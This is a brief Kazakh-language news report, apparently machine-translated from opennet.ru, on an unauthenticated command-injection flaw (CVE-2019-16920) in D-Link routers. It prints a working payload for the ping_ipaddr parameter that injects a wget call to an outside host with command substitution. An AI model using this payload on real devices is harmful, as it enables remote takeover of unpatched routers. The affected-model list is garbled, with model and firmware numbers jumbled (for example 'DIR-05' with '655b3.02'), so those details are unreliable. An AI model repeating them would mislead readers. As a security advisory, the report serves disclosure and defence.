D-Link маршрутизаторларындағы қашықтан пайдалануға болатын осалдық

D-Link сымсыз маршрутизаторларында анықталды қауіпті осалдық (CVE-2019–16920), ол аутентификациясыз қол жетімді «ping_test» өңдеушісіне арнайы сұрау жіберу арқылы құрылғы жағында кодты қашықтан орындауға мүмкіндік береді.

Бір қызығы, микробағдарлама әзірлеушілерінің айтуынша, «ping_test» қоңырауы аутентификациядан кейін ғана орындалуы керек, бірақ шын мәнінде ол веб-интерфейске кіруге қарамастан кез келген жағдайда шақырылады. Атап айтқанда, apply_sec.cgi сценарийіне қатынасу және «action=ping_test» параметрін беру кезінде сценарий аутентификация бетіне қайта бағыттайды, бірақ сонымен бірге ping_test-пен байланысты әрекетті орындайды. Кодты орындау үшін тестілеуге жіберілген IP мекенжайының дұрыстығын дұрыс тексермей ping утилитасын шақыратын ping_test-тің өзінде басқа осалдық пайдаланылды. Мысалы, wget утилитасына қоңырау шалу және «echo 1234» пәрменінің нәтижелерін сыртқы хостқа тасымалдау үшін «ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// параметрін көрсетіңіз. test.test/?$( echo 1234)».

D-Link маршрутизаторларындағы қашықтан пайдалануға болатын осалдық

Төмендегі модельдерде осалдықтың болуы ресми түрде расталды:

  • 655b3.02 немесе одан жоғары микробағдарламасы бар DIR-05;
  • 866b1.03 немесе одан жоғары микробағдарламасы бар DIR-04L;
  • DIR-1565 микробағдарламасы 1.01 немесе одан жоғары;
  • DIR-652 (проблемалық микробағдарлама нұсқалары туралы ақпарат берілмейді)

Бұл үлгілерге қолдау көрсету мерзімі әлдеқашан бітті, сондықтан D-Link деп мәлімдеді, ол осалдықты жою үшін жаңартуларды шығармайды, оларды пайдалануды ұсынбайды және оларды жаңа құрылғылармен ауыстыруға кеңес береді. Қауіпсіздіктің уақытша шешімі ретінде веб-интерфейске кіруді тек сенімді IP мекенжайларымен шектей аласыз.

Кейіннен осалдықтың да болғаны анықталды әсер етеді DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 және DIR-825 үлгілері, жаңартуларды шығару жоспарлары әлі белгісіз.

Ақпарат көзі: opennet.ru

пікір қалдыру